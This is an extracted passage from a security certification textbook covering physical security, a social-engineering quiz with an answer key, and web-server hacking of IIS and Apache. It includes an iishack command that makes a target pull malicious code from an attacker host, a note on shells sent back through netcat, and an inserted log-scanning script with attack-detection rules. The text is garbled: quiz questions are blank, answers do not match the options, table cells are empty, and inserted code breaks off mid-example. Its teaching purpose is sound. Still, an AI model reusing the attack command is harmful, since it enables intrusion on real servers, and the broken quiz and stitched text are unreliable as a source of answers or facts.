retinal scanners see the blood vessel patterns in the retina. These patterns can reveal if a
person had diabetes or high blood pressure. Similarly, because the retinal scanning device
requires the placement of the eye on an eyepiece, exchange of body fluids is a concern.
Some of the biometric characteristics that are commonly used are shown in Table 12-6.
Table 12-6: Biometric Characteristics
CHARACTERISTIC       DESCRIPTION        CER                          THROUGHPUT RATE
Hand geometry        3D hand features   0.1%                         4 sec
Iris scan                               0.5%                         3 sec
Retina scan                             1.5%                         6 sec
Signature dynamics                      Not available at this time   8 sec
Fingerprints                            4.5%                         6 sec
Voice                                   8%                           12 sec
Facial recognition                      Not available at this time   3 sec
DETECTOR                 DESCRIPTION
Photoelectric sensors
Dry contact mechanisms   Switches or metal foil tape that open a circuit when an intrusion occurs
Motion detectors
Capacitance detectors
Sound detectors
Intrusion detection devices are connected to alarm systems to alert appropriate security personnel of
a possible penetration of a facility. The alarms can be local to the facility, connected to a central
monitoring station operated by the organization, connected to a private security monitoring service, or
connected to a local fire or police station. Alarm systems should also incorporate back-up power
sources and the means to detect tampering in alarm transmission lines.
Fax Machines
Fax machines are an area of vulnerability that has to be protected. Because these devices can send
and receive sensitive information and usually do so in open view, they provide an opportunity for an
attacker to compromise critical data. In models that use ribbons, these discarded supplies can provide
copies of incoming faxes. Fax servers are also vulnerable to penetration by hackers and are
accessible through unprotected maintenance hooks. Controls for fax machines include the following
practices:
Machines should be placed in secure, restricted access areas.
Ribbons and refills should be shredded.
A security policy should be developed, practiced, and enforced for fax machine use and
maintenance.
Fax servers should be protected with security hardware and software.
Guards
Guard dogs
Fences. Important means of facility and boundary control; cost and appearance issues.
Height characteristics: 3 to 4 feet deters casual trespassers; 6 to 7 feet difficult to climb
easily; and 8 feet with strands of barbed wire deters most intruders. Perimeter
Intrusion Detection and Assessment System (PIDAS) fencing incorporates
intrusion sensors in the fence and sounds an alarm when there is movement of
the fence. Susceptible to false alarms from animals or wind.
Mantrap. Access is through a double door arrangement where one door must be closed for
the other to open.
Bollards. Concrete pillars of various sizes and shapes that are placed at the periphery of
buildings to prevent vehicles from driving through exterior walls and doors.
Lights
Closed circuit TV (CCTV)
PC and laptop controls. Protection of PCs and laptops from theft; port controls to prevent use of serial
and parallel interfaces; power-on password protection; laptop tethers to fixed
objects.
Locks
Locks are a simple and effective deterrent to intruders. Locks vary in construction and application, as
summarized in the following descriptions:
Warded locks. The common padlock that is opened with a key; subject to lock picking
Tumbler locks. More secure locks that use pin tumblers, lever tumblers, or wafer tumblers
Combination locks. Locks with dials or a series of wheels that require the correct combination of
numbers to open; subject to shoulder surfing observation from other individuals
Device locks/cable locks. Locks that are used to secure equipment; these types of locks
include:
There are a number of methods of addressing the problem of data remanence. These methods
include:
Clearing. Overwriting the magnetic medium a number of times; usually done when the media
remain in the original environment
These methods are important because the normal erasure of data performed through the operating
system does not delete the data but only modifies the File Allocation Table and changes the first
character of the file.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
2.
3.
Dumpster diving and shoulder surfing are examples of which subtype of social engineering
attack?
a. Important user posing
b. In person
c. Masquerading
d. Technical support
4.
Pop-up windows, spam email, email attachments, and fake websites are examples of
which category of social engineering?
a. Human-based (person-to-person)
b. Computer-based
c. Social-based
d. Judgment-based
5.
A social engineering attack where the attacker convinces an unsuspecting individual that
he or she is authorized by a third party in a position of authority to receive sensitive
information from the individual falls under what category of social engineering?
a. Human-based (person-to-person)
b. Computer-based
c. Technical-based
d. Judgment-based
6.
Which one of the following is not a characteristic that motivates individuals to become
victims of social engineering attacks?
a. Inclination to respond to people in authority
b. Desire to return a favor
c. Fear of missing a deadline
7.
Which one of the following best demonstrates the degree of threat posed by social
engineering?
a. Because social engineering does not bypass technical protection mechanisms, it is
not a very great threat.
b. Social engineering allows an attacker to bypass the best technical protection
mechanisms and acquire critical data from unsuspecting human sources.
c. Social engineering allows an attacker to bypass the best technical protection
mechanisms, but is not effective in acquiring critical data from unsuspecting human
sources.
d. Social engineering does not allow an attacker to bypass the best technical
protection mechanisms and acquire critical data from electronic devices.
8.
Which one of the following is not a step in conducting a reverse social engineering attack?
a. Making it difficult for the target victim to contact the attacker.
b. Sabotaging the target's equipment.
c. Ensuring the target is aware that the attacker is a person of authority with the skills
needed to repair the equipment (advertising).
d. In providing assistance in solving a problem, the attacker gains the trust of the
target and obtains access or sensitive information.
9.
In what type of attack does the attacker send a fraudulent email message which states
that the email is from a bank, requests the bank account ID and password, and provides a
link to a web server that generates a window that looks like the bank's website?
a. Smurf
b. Phreaking
c. Phishing
d. Webing
10. Which mechanism is used to maintain the state of a website, provide a means of running
attack code to present a false Web page, and acquire sensitive information?
a. Page views
b. Obfuscation
c. Hidden tabs
d. Hidden frames
11. A hacker implementing a phishing attack sometimes obscures a fake website in order to
avoid being traced through the registration records of the domain. This technique is known
as which of the following acts?
a. URL misdirection
b. URL obfuscation
c. URL virtualization
d. URL linking
12. Which one of the following methods is not commonly used to obscure a URL?
a. Representing characters in the URL in hexadecimal format
b. Expressing the domain name as dotted decimal IP address in different formats,
such as hexadecimal, octal, or double word (dword)
c. Adding irrelevant text after http:// and before the @ symbol
d. Incrementing memory buffers through software modifications
13. Linking different parts of an image without having to partition the image into separate
subimages is called:
a. Image mapping
b. Image transference
c. Image translation
d. Image division
14. The technique of linking to different parts of an image without having to partition the image
into separate subimages is used by phishing attackers to accomplish which one of the
following?
a. To terminate a phishing attack
b. To redirect a phishing victim to a fraudulent, imitation website
c. To steer a phishing victim away from a fraudulent, imitation website
d. Is not used in any type of phishing attack
15. Dumpster diving, stealing a person's mail, and stealing a person's wallet or purse are used
for which of the following attacks?
a. Dictionary
b. Phishing
c. Identity theft
d. Back door
16. Social engineering primarily involves which one of the following?
a. Focus on technical components
b. Personnel-related interactions
c. Encryption
d. Business continuity
17. Which one of the following is not a measure to defend against social engineering attacks?
a. Employee awareness training
b. Information and document classification
c. Policies and procedures
d. Providing passwords by telephone
18. Document controls, help desk practices, hiring and termination procedures, access
controls, and password assignments are areas that should be addressed by which one of
the following items to defend against social engineering?
a. Policies and procedures
b. Document classification
c. Physical security
d. Certification
19. Newsletters, understanding information classification procedures, understanding how to
protect sensitive information, and recognizing which data have to be protected are
components of which social engineering defense?
a. Policies and procedures
b. Employee awareness training
c. Physical security
d. Certification
20. Which of the following is the most important criterion for classifying information?
a. Useful life
b. Personal association
c. Value
d. Age
21. Which one of the following actions is not a reason to classify information?
a. Satisfy external queries
b. Meet regulatory requirements
c. Support confidentiality and availability
d. Identify protection mechanisms for information
22. What information classification level states, "the unauthorized disclosure of this information
could cause serious damage to the country's national security"?
a. Confidential
b. Sensitive But Unclassified
c. Top Secret
d. Secret
23. Which one of the following is not a physical security practice that is effective against social
engineering?
a. Leaving sensitive documents unlabeled
b. Securing sensitive documents in locked cabinets
c. Encrypting hard drives
d. Shredding discarded paper documents
24. Which one of the following is not a typical threat to physical security?
a. Natural events such as thunderstorms, hurricanes, tidal waves, snow storms,
earthquakes, and tornadoes
b. Attacks against encryption
c. Military action, strikes, sabotage, theft, and vandalism
d. Emergencies such as release of toxic gases, fires, loss of heat, loss of electrical
power, loss of air conditioning, equipment failure, and water damage
25. What are the two metrics that are useful in evaluating failure of various types of
equipment?
a. Mean Time Between Failure (MTBF) and Mean Time to Test (MTTT)
b. Mean Time From Initiation (MTFI) and Mean Time to Repair (MTTR)
c. Mean Time Between Failure (MTBF) and Mean Time to Repair (MTTR)
d. Mean Time To Repair (MTTR) and Mean Time to Test (MTTT)
26. In selecting a new site for a data facility, which one of the following is not an area that has
to be considered?
a. Joint tenancy
b. Visibility
c. Transportation
d. Logical access controls
27. What aspect of facility control generates information such as time and date of attempts to
access, modification of access privileges, and security violations?
a. Man-trap
b. Closed circuit TV
c. Access log of events
d. Media controls
28. Employment background checks, non-disclosure agreements, exit interviews, and
changes of passwords are elements of which type of controls?
a. Logical
b. Personnel
c. Encryption
d. Access
29. In electrical systems, which one of the following defines a prolonged low voltage?
a. Blackout
b. Sag
c. Brownout
d. Fault
30. In electrical systems, a surge is:
a. Prolonged high voltage
b. Momentary high voltage
c. Momentary noise
d. Spike
31. In fire safety, the primary concern is which one of the following?
a. Loss of critical documents
b. Personnel safety
c. Economic impact
d. Equipment loss
32. Which one of the following extinguishing agents is used on a fire with Class A
combustibles?
a. Water or soda acid
b. CO2
c. Halon
d. All of the above
33. Which one of the following extinguishing agents is banned by the Montreal Protocol of
1987 because it decomposes into toxic chemicals at high temperatures?
a. CO2
b. CO
c. Halon
d. Soda acid
34. Which one of the following describes the combustible materials in a Class C fire?
a. Wood, cloth, paper, rubber, ordinary combustibles
b. Flammable liquids, gases, oils, and paints
c. Energized electrical equipment
d. Flammable chemicals such as magnesium and sodium
35. Which type of sprinkler system uses a fusible link in the water outlet nozzle?
a. Wet pipe
b. Dry pipe
c. Deluge
d. Hybrid
36. Which type of access card responds to the magnetic field of the reader?
a. Passive electronic
b. Photo ID
c. Active electronic
d. Magnetic stripe
37. In biometrics, a Type 1 authentication mechanism is which one of the following?
a. Something you have
b. Something you know
c. Something you are
d. Something you do
38. In biometrics, the Crossover Error Rate (CER) is defined as:
a. The percentage of invalid subjects that are falsely accepted
b. The percentage of invalid subjects that are falsely rejected
c. The percent in which the False Rejection Rate (FRR) is greater than the False
Acceptance Rate (FAR)
d. The percent in which the False Rejection Rate (FRR) equals in the False
Acceptance Rate (FAR)
39. Which one of the following describes additional biometric performance characteristics?
a. Enrollment time
b. Throughput rate
c. Acceptability
d. All of the above
40. Which type of fence deters most intruders?
a. 8 feet high with strands of barbed wire
b. 3 to 4 feet high with strands of barbed wire
c. 6 to 7 feet high
d. 5 to 6 feet high
41. When using illumination for physical security, what type of illumination should be used to
cover sensitive areas?
a.
b.
c.
d.
42. What term refers to data that reside on magnetic media following erasure?
a. Clearing
b. Object reuse
c. Data remanence
d. Purging
Answers
1.
Answer: a
2.
Answer: b
3.
Answer: b
The correct answer is b, an in-person attack where a hacker conducts his or her information
gathering in person on the premises of an organization. Answer a, important user posing, occurs
when an attacker pretends to be an individual in a position of authority and uses that pretense to
intimidate people into providing information for fear of offending the important person. Answer c,
masquerading or impersonation, involves an attacker pretending to be someone else: for example,
an outside contractor, a repairman, or a delivery person. Answer d, technical support, refers to an
attacker posing as a technical support person for an organization and requesting passwords and
other sensitive information from a trusting employee by telephone or in person.
4.
Answer: b
5.
Answer: a
6.
Answer: d
People are trusting, in general, and this characteristic is taken advantage of by social engineering
attackers.
7.
Answer: b
8.
Answer: a
In fact, a good reverse social engineering implementation will result in the target calling the
attacker and requesting help. The attacker will not have to contact the target, but merely waits for
the target's call.
9.
Answer: c
10. Answer: d
11. Answer: b
12. Answer: d
13. Answer: a
14. Answer: b
15. Answer: c
16. Answer: b
17. Answer: d
18. Answer: a
19. Answer: b
20. Answer: c
21. Answer: a
22. Answer: d
23. Answer: a
24. Answer: b
25. Answer: c
26. Answer: d
27. Answer: c
28. Answer: b
29. Answer: c
30. Answer: a
31. Answer: b
32. Answer: a
33. Answer: c
34. Answer: c
35. Answer: a
36. Answer: a
37. Answer: b
38. Answer: d
39. Answer: d
40. Answer: a
41. Answer: b
42. Answer: c
Chapter List
Chapter 13: Web Server Hacking and Web Application Vulnerabilities
Chapter 14: SQL Injection Vulnerabilities
Chapter 15: Cryptography
Chapter 16: Cracking Web Passwords
Web Servers
The most widely used web servers are Microsoft IIS, Apache, and Sun Java System Application
Server. The most recent versions of IIS are version 5.1 for Windows XP Professional, IIS 6.0 for
Windows Server 2003 and Windows XP Professional x64 Edition, and IIS 7.0 for Windows Longhorn
Server and Windows Vista.
The Apache HTTP Server is the most popular Web server in use today. It is open-source, free
software developed by the Apache Software Foundation for Windows, Unix, Novell NetWare, and a
number of other operating systems. Version 2.2.4 of Apache HTTP server has recently been released.
The Sun Java System Application Server is also available at no cost in three editions from Sun
Microsystems. This software provides a Java 2 platform for developing and delivering Java Web
applications and services.
IIS Attacks
Three basic types of attacks have been used against IIS. These attacks are buffer overflow, file
system traversal, and source disclosure.
Buffer Overflow
Four examples of buffer overflow attacks against IIS are the IPP Printer Overflow attack, the ISAPI
DLL Buffer Overflow attack, the WebDAV/ntdll.dll exploit, and the attack using IISHack.exe.
The Printer Overflow exploits msw3prt.dll, which is the ISAPI filter that interacts with printer
files and processes user requests. Sending an HTTP printer request with 420 bytes in the Host field to
the server will cause the server to overflow and return a command prompt to the sender, who can use
hacking tools such as IIs5hack to initiate an exploit.
The ISAPI DLL Buffer Overflow attack exploits Microsoft's IIS Indexing Service DLL (ida.dll) and
Microsoft Data Query file (idq.dll). Associated buffer overflow attacks result in the execution of
malicious code due to a lack of input buffer parameter checking in the code used to process input
URLs for the .idq or .ida application mapping.
Installed versions of IIS include World Wide Web Distributed Authoring and Versioning (WebDAV)
capability as specified in RFC 2518. This capability implements a standard for file management and
editing on the Web. When a lot of data are sent to WebDAV, the data are sent to their ntdll.dll
components, which do not conduct sufficient bounds checking, causing a buffer overflow. This
condition can result in the execution of malicious code in the IIS environment.
In the IISHack.exe attack, the IIS http daemon buffer is made to overflow, and malicious code can
then be executed. An attack against WebserverA that is listening to port 80 is summarized in the
following commands. The malicious script is resident on hackserver, and mal.exe is the link to the
malicious script.
c:\ iishack www.WebserverA.com 80 www.hackserver.com/mal.exe
Source Disclosure
In the source disclosure attack, IIS is manipulated to reveal the source code of a server side
application. This attack can be conducted, for example, against the Microsoft Windows NT File
System (NTFS). One of the data streams in NTFS that contains the main elements of the file has an
attribute called $DATA. The IIS server is vulnerable to file-related requests involving the $DATA
attribute, resulting in the revelation of the contents of the file. Another attack is implemented
submitting a file request that appends +htr to the global.asa file. HTR is a first-generation
HTML-like advanced scripting technology that was never widely adopted. Active Server Pages (ASP)
was introduced in IIS 4.0 and displaced HTR.
Source code disclosure exploits can provide the following information to the attacker:
Credentials from the Web.config file
Database organization
Source code vulnerabilities
Knowledge of the application
Application parameters
Vulnerabilities in source code comments
Escalation of privileges
Purchasing data
Credit card numbers
An additional source disclosure involves the showcode.asp example files. IIS 4.0 includes these
sample files to provide information about ASP to Web developers. Showcode.asp provides the ability
to view the source code of applications on the server, both within and without the document root
directory, through a browser.
Apache Attacks
The Apache server has a high degree of reliability, but also has vulnerabilities. Some of the attacks
that exploit Apache vulnerabilities include:
Apache chunked encoding vulnerability. The HTTP protocol provides for communication
between the Web server and a browser to negotiate the size of chunks of data to be sent to the
server when the amount of data being transmitted to the server is not known in advance. A flaw in
the Apache software misreads the size of the chunks to be received, resulting in a stack overflow
and the possibility of executing malicious code.
Mod_proxy buffer overflow. Apache uses the mod_proxy module to set up a proxy server for
HTTP and FTP protocols. A vulnerability in the module file proxy_util.c can lead to a buffer
overflow in the web server, enabling the execution of malicious code that can cause a denial of
service in the server.
Long URLs. Lengthy URLs processed by the mod_autoindex, mod_negotiation, and mod_dir
modules can result in the server showing directory contents.
PHP scripting. PHP is a general-purpose scripting language that is commonly used with Apache
Web servers. PHP can be used with HTML for Web development but contains vulnerabilities that
would allow a hacker to run malicious code on the web server host.
URL trailing slashes. Many trailing slashes in a URL can expose a listing of the original
directory.
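The IIS and Apache request patterns described in the two sections above leave recognizable traces in server logs, which is where a defender usually meets them first. The script below is an added example, not from the original chapter or from either server project: it parses constructed W3C-style log lines and flags requests that match simple indicators drawn from the text (an oversized Host header on a .printer request, a long query string on an .ida or .idq mapping, a `::$DATA` or `+.htr` suffix on a file request, a request for the `showcode.asp` sample file, and a URL ending in many slashes). The field layout (including a logged Host header, which IIS does not record by default), the numeric thresholds, the rule names and the sample lines are all assumptions; the chapter itself gives only the 420-byte Host figure.

```python
"""Added example: flagging the web-server attack patterns discussed in the
chapter in constructed W3C-style log lines. A review aid, not an IDS."""
import re

# Thresholds are assumptions; the chapter cites 420 bytes in the Host field
# for the printer overflow, so anything well above a normal hostname is flagged.
HOST_LEN_LIMIT = 256
QUERY_LEN_LIMIT = 200
TRAILING_SLASH_LIMIT = 5

# (rule name, predicate over a parsed record)
RULES = [
    ("printer-host-overflow",
     lambda r: r["stem"].lower().endswith(".printer") and len(r["host"]) > HOST_LEN_LIMIT),
    ("indexing-isapi-overflow",
     lambda r: r["stem"].lower().endswith((".ida", ".idq")) and len(r["query"]) > QUERY_LEN_LIMIT),
    ("ntfs-data-stream-disclosure",
     lambda r: "::$data" in r["stem"].lower()),
    ("htr-source-disclosure",
     lambda r: re.search(r"\+\.?htr$", r["stem"], re.IGNORECASE) is not None),
    ("sample-file-showcode",
     lambda r: r["stem"].lower().endswith("showcode.asp")),
    ("trailing-slash-listing",
     lambda r: re.search(r"/{%d,}$" % TRAILING_SLASH_LIMIT, r["stem"]) is not None),
]

# Constructed log lines (not from any real server). Space-separated fields:
# date time c-ip cs-method cs-uri-stem cs-uri-query cs(Host) cs-bytes sc-status
SAMPLE_LOG = """\
2024-03-01 10:00:01 198.51.100.7 GET /index.htm - www.example.test 310 200
2024-03-01 10:00:05 198.51.100.7 GET /images/logo.gif - www.example.test 280 200
2024-03-01 10:01:10 203.0.113.9 GET /NULL.printer - {long_host} 900 500
2024-03-01 10:01:12 203.0.113.9 GET /default.ida {long_query} www.example.test 1400 200
2024-03-01 10:02:20 203.0.113.9 GET /global.asa::$DATA - www.example.test 260 200
2024-03-01 10:02:25 203.0.113.9 GET /global.asa+.htr - www.example.test 262 200
2024-03-01 10:02:30 203.0.113.9 GET /samples/showcode.asp - www.example.test 350 200
2024-03-01 10:03:00 203.0.113.9 GET /private//////// - www.example.test 250 200
""".format(long_host="A" * 420, long_query="X" * 240)


def parse_line(line):
    """Split one log line into a record dict; '-' in the query field means empty."""
    date, time, ip, method, stem, query, host, nbytes, status = line.split(" ", 8)
    return {"time": f"{date} {time}", "ip": ip, "method": method, "stem": stem,
            "query": "" if query == "-" else query, "host": host,
            "bytes": int(nbytes), "status": int(status)}


def scan(log_text):
    """Return a list of (timestamp, client ip, rule name, uri stem) for each hit."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):  # skip blanks and W3C directives
            continue
        rec = parse_line(line)
        for name, test in RULES:
            if test(rec):
                hits.append((rec["time"], rec["ip"], name, rec["stem"]))
    return hits


def offenders(hits):
    """Count flagged requests per client IP so a reviewer can prioritize."""
    counts = {}
    for _, ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(*h)
    print(offenders(found))
```

Two of the sample lines are ordinary traffic and produce no hits; the remaining six each match exactly one rule, all from the same client. On a patched server these requests fail, but their presence in the log is still worth a look because they show someone is testing for the specific weaknesses the chapter describes.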
Hacking Tools
A variety of tools have been developed to probe, disassemble, and gain access to code on Web
servers. Not surprising, these tools are also used for hacking. A summary of some of these tools is
listed as follows:
CleanIISLog. This provides a means for an attacker to cover tracks by clearing entries of his or
her IP address in IIS log files.
RPC DCOM. Remote Procedure Call Distributed Component Object Model creates a stack-based
buffer overflow attack because of improper handling of TCP/IP messages by Microsoft
RPC software. Overflow manifests in RPC DCOM interface at ports 135 or 139. An attacker can
exploit this vulnerability to gain system privileges and create new accounts, install malicious
code, or remove or modify files.
cmdasp.asp. ASP runs on a web server and is used to produce interactive, dynamic Web pages.
ASP Web pages can be identified by the extension .asp rather than .htm. CmdAsp.asp is an
interactive command prompt to an ASP Web page on IIS servers. The IUSR_COMPUTER and
IWAM_COMPUTER user accounts represent a vulnerability in that they will execute scripts such
as ASP or Perl and provide a back door to the IIS server. Cmdasp.asp can also send a shell
back to the hacker's PC by uploading nc.exe to the IIS web server.
iiscrack.dll. This is similar to cmd.asp and provides a path for a hacker to send commands that
run on the web server with System privileges.
ispc.exe. This is a client that copies the Trojan ISAPI DLL to a web server and sets up a remote
shell with System privileges.
WebInspect. This is a web application vulnerability scanner that categorizes over 1,500 Web
pages, can perform over 30,000 security checks, and provides remediation recommendations.
ASN. The Microsoft Abstract Syntax Notation 1 (ASN.1) Library does not check buffer parameters
and can suffer a buffer overflow. An attack based on this vulnerability can give the hacker system
privileges.
Microsoft Windows NT 4.0 / 2000 Unspecified Executable Path Vulnerability. This enables
automatic execution of Trojans when DLL files and executables are not preceded by a registry
path. In this situation, the operating system will try to find the file in a sequence of directories in a
specific order. This behavior can facilitate the automatic execution of Trojans if they are renamed
as executables that do not have a specified path.
execiis-win32.exe. This is a directory traversal attack that uses cmd to execute commands on an
IIS web server.
Patch Management
Patch management is necessary to protect an organization from attacks and maintain the continuity
and reliability of operations and production systems. Patch management is the process of organizing
and directing the distribution and installation of provisional software revisions to resources on the
network. This additional software is referred to as a patch. A similar term is a hotfix, which refers to
adding a patch during normal operation of the computer system.
In organizations with large numbers of distributed resources, tracking and installing patches can be
expensive, time consuming, and people intensive. Automated patching systems greatly reduce the
time and expense of patching.
The motivations for installing patches in a timely manner include the costs associated with the
unavailability of computing resources, the costs to return a victimized computer to operating condition,
impact on an organization's reputation, possible compromise of data, and potential legal liability.
Problems can also result from defective patches that do not address the identified issues or that
create additional vulnerabilities, particularly in automated patching systems. Another concern is that a
typical organization might have different versions of operating systems and applications running on a
variety of platforms, so a common patch deployment might not be practical and effective. This
UpdateExpert. This is a security management utility for Windows 2000/NT systems and Terminal
Server computers that supports identifying, downloading, and installing the required hotfixes and
service packs.
Qfecheck. This is a Microsoft command-line tool that allows network administrators to track and
verify installed Windows 2000 and Windows XP hotfixes.
HFNetChk. This is a Microsoft software engine available through the command-line interface of
the Microsoft Baseline Security Analyzer (MBSA) Version 1.1.1. HFNetChk provides the system
administrator with the ability to check the patch status of all the machines in a network from a
central location by accessing an XML database that is kept current by Microsoft. It is applicable to
a variety of Microsoft products, including Windows XP, Windows 2000, Windows Server 2003, SQL
Server 7.0, and Internet Explorer 5.01 and later.
Cacls.exe. This is an interactive, command-line utility for Windows NT/2000/XP used for
managing and storing access control lists (ACLs). It also supports other administrative functions
in enterprise environments. Cacls.exe works under the NTFS file system and is stored by
default in the %SystemRoot%\System32 folder for all installations of Windows NT, 2000, and
XP.
Cross-Site Scripting (XSS). In XSS, an attacker sends a specific request to a website that
causes the website to send malicious Web or email code to another user. By exploiting
vulnerabilities in the web server, an attacker uses the website as an intermediary for transferring
malicious code to another victim. In this attack, the victim is usually not aware of being exploited
because he or she assumes the data received are from a valid Web server. One example of
malicious action is for the attack code to copy cookies from the victim's computer and relay them
to the attacker.
Remote code execution. This attack provides the means for a hacker to execute his or her
system level code on a target web server. With this capability, an attacker can compromise the
web server and access files with the same rights as the server system software. For example, a
number of XML-RPC PHP programs contain a vulnerability that could enable the transfer of
unchecked user commands to the eval( ) function in the XML-RPC server.
Username enumeration. This attack manipulates the backend authentication script to inform an
attacker whether a submitted user name is valid. Iterations exploiting this vulnerability can aid the
attacker in determining the correct user name through interpretation of error messages. Initial
guesses at usernames might include typical default settings such as guest and admin.
SQL injection. This attack focuses on the database application of a web server and enables a
hacker to acquire sensitive information stored in the database or to execute remote code. The
name refers to Microsoft's SQL database, but it is also applicable to other databases such as
Oracle Net Listener and MySQL. One version of the attack occurs when the user input stream
contains string literal escape characters and these characters are not properly screened. For
example, the attacker might place the ' character in the username field. This input can modify
the results of SQL statements conducted on the database and result in manipulation of the
database contents and, possibly, the Web server. One reason for this is that error messages
displayed by the SQL server from incorrect inputs such as the ' character in the username can
provide valuable information, such as password hashes, usernames, and the database name, to
an attacker.
Command injection. This attack injects system commands into computer program variables
such that they are executed on the web server.
Attack obfuscation. This is the practice of obscuring or making something difficult to analyze or
understand. Code, particularly Java, C++, and Perl code, can be obfuscated in order to prevent
reverse engineering of programs. Attackers use URL obfuscation to avoid the possibility of the
source of an attack being traced to them.
DMZ protocol. A Demilitarized Zone (DMZ) is a neutral, intermediate zone, between an external
network and a secure, internal network. A DMZ normally incorporates a firewall, which a hacker
will attempt to bypass using IP, TCP, and HTTP protocol attacks.
Zero-day attack. This attack exploits a vulnerability before it is generally known to the public
and, usually, before patches for the vulnerability have been announced and distributed.
Buffer overflow. This is an input validation attack that is usually the result of weak or nonexistent parameter checking in the processing software. The attack sends data that exceed a
buffer capacity, causing an overflow of data. These data can be interpreted as executable code
and, when run, can give the attacker system level privileges on the web server.
Form/Hidden field manipulation. This is altering the data in a hidden field in order for an
application to use attack-related data.
Netcat
In addition to scanning, the hacker can use Netcat to categorize the web server (banner grabbing)
and proceed with an attack to escalate privileges and provide access to files in all portions of the web
server. Netcat is a tool that can be used to read and write information on TCP and UDP networks. The
GNU Netcat site (http://netcat.sourceforge.net) describes Netcat as "a featured networking utility which
reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a
reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the
same time, it is a feature-rich network debugging and exploration tool, since it can create almost any
kind of connection you would need and has several interesting built-in capabilities."
The original version of Netcat was developed in 1995 by Avian Research. A newer version, developed
under the GNU Netcat project, was composed by Giovanni Giacobbi. Both versions can be run with
the nc command.
The Netcat syntax is shown in the Netcat help screen in Figure 13-2.
Black Widow
Black Widow is a product of SoftByte Labs that performs website scans and website ripping. Website
ripping is the ability to copy the structure of a Web site to a local disk and obtain a complete profile of
the site and all its files and links.
Instant Source
Another tool that provides for examination of the source code of a Web page is Instant Source from
www.blazingtool.com. Instant source works with Internet Explorer and will display source code for
selected portions of a Web page. The tool will also display images, Flash movies, and scripts files on
a Web page.
Wget
A useful site ripping free tool that can obtain Web files using FTP and HTTP is GNU Wget
(www.gnu.org/software/wget/wget.html). Wget works with Windows and Unix and can acquire HTML
pages and data from FTP sites while working in background mode. This tool can time stamp acquired
files and note if changes have occurred over time.
Websleuth
Websleuth is an open-source manual exploration tool that comprises a variety of Visual BASIC
applications for analyzing the security posture and functionality of Web applications. It is used by
auditors who wish to probe and evaluate the basic components of Web applications and possible
vulnerabilities, including parameter manipulation and cross-site scripting. It also provides for adding
code plug-ins to address specific concerns. A Websleuth screenshot is shown in Figure 13-3.
Nikto
Nikto is an open-source web server scanner that scans for malicious files and CGIs on a variety of
servers. It is a Perl-based vulnerability tool that scans rapidly and is detectable when it operates.
Wikto
Wikto is a Web-scanning tool similar to Nikto but with added features. Wikto does not scan Web
applications or search for open ports, but probes for web server vulnerabilities such as vulnerable
scripts and directories that might be subject to compromise. Wikto comprises the following three main
elements:
Back End Miner. This searches recursively through directories and applies fuzzy logic to
ascertain if a file/directory exists.
Googler. This searches for directories on the website by looking for Google key words, extracting
directory names from URLs retrieved, and searching for interesting files on the website. To
make use of this feature, a Google key is required.
Nikto-like functionality. This performs Nikto-type scans but uses different mechanisms.
Figure 13-4: Wikto Googler screen (Taken from Sensepost Web site)
Nessus
Nessus is a freely available, rule-based remote vulnerability scanner that uses script-based plug-ins.
The source code of Nessus is proprietary to Tenable Network Security.
Network Utilities
Network utility programs perform functions useful to network engineers and security engineers. These
functions might be security related, such as supporting penetration testing or identifying security flaws.
Other tasks might include checking for unidentified items that have appeared in log files. A number of
the popular utilities and related tools are reviewed in the following list:
Whisker/libwhisker. These are a CGI vulnerability scanner and a Perl-based library module,
respectively; however, the whisker scanner has been supplanted by the Nikto tool. Both Whisker
and Nikto use libwhisker, which is an effective HTTP server security scanner. Libwhisker is a Perl
library module and is not a direct application. Using the Perl library, custom HTTP packets can be
developed using the whisker anonymous hash data structure, which is similar to an associative
array. This hash can be used to generate HTTP requests and acquire HTTP responses
from websites.
Shadow Security scanner. This conducts vulnerability scans on the Internet, extranets, and
intranets and offers remediation strategies. It comprises a variety of system-specific vulnerability
modules, including those for CGI, NetBIOS, HTTP, FTP, UDP, MySQL, and others.
Countermeasures
Up to this point in this chapter, the focus has been primarily on identifying web server vulnerabilities,
security flaws, attack scenarios, and software supporting these activities. This section presents an
overview of effective countermeasures and security approaches for the most common attacks:
IIS buffer overflow. Buffer overflows can be mitigated by conducting frequent scans for server
vulnerabilities, promptly acquiring and installing Microsoft service packs, implementing
effective firewalls, applying URLScan and IISLockdown utilities, and removing IPP printing
capability.
Secure IIS. A number of modifications were made to IIS 6.0 to enhance security. These
changes include:
Not installing a number of services and features by default
Improved authentication and access control
Modifications of Active Server Pages (ASP) components
Installation in locked-down mode
Limitations on Multipurpose Internet Mail Extensions (MIME) types
Default rendering of ASP.NET and ASP inoperative
Default inactivation of anonymous password synchronization
Limitation of access by executables
File system traversal. File system traversal effectiveness can be reduced by promptly
applying appropriate Microsoft hotfixes and patches, restricting privileges to executables such
as cmd.exe, and locating the system software on a different disk drive from the Web site
software and content directory. Another effective measure is to install the IISLockdown tool
from Microsoft. This tool includes URLScan software that screens web server requests and
inhibits requests containing attack-type characters.
Remote code execution. Execution of remote code can be reduced or eliminated by not using
shell commands, if possible. Another useful measure would be to restrict processing of user
input data that has not been sanitized beforehand.
SQL injection. A counter against SQL injection is to provide customized database server error
messages that do not provide the attacker with useful data. Apply the principle of least
privilege to a user by not connecting the user to the database with the privileges of an owner of
the database or of a superuser.
Cross Site Scripting (XSS). One countermeasure against this type of attack is to constrain
and sanitize the input data stream. Input originating from server controls should be subject to
ASP.NET validator controls such as RangeValidator. All input data should be checked for data
type, format, range, and irregular expressions. The second principal control against XSS is to
encode output that contains user input data or data from databases. HtmlEncode can be
applied to encode characters with special designations in HTML, thus obscuring executable
code that would otherwise be run.
Username enumeration. Compose and return consistent error messages of the type that do
not provide keys to valid usernames. Also, survey to ensure that maintenance, testing, and
other general accounts with predictable passwords are not active when a web application is
enabled.
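The two countermeasures just described, a single consistent login failure message and HtmlEncode-style output encoding behind a format check on the input, as an added Python example that is not from the book; the user store, salt, iteration count and messages are constructed sample values.

```python
import hashlib
import hmac
import html
import re

# Every authentication failure returns this one message, so the reply never
# says whether it was the username or the password that was wrong.
GENERIC_LOGIN_ERROR = "Invalid username or password."

# Constructed sample values (not from the book): a fixed salt and one account.
_SALT = b"constructed-sample-salt"
_ITERATIONS = 20_000


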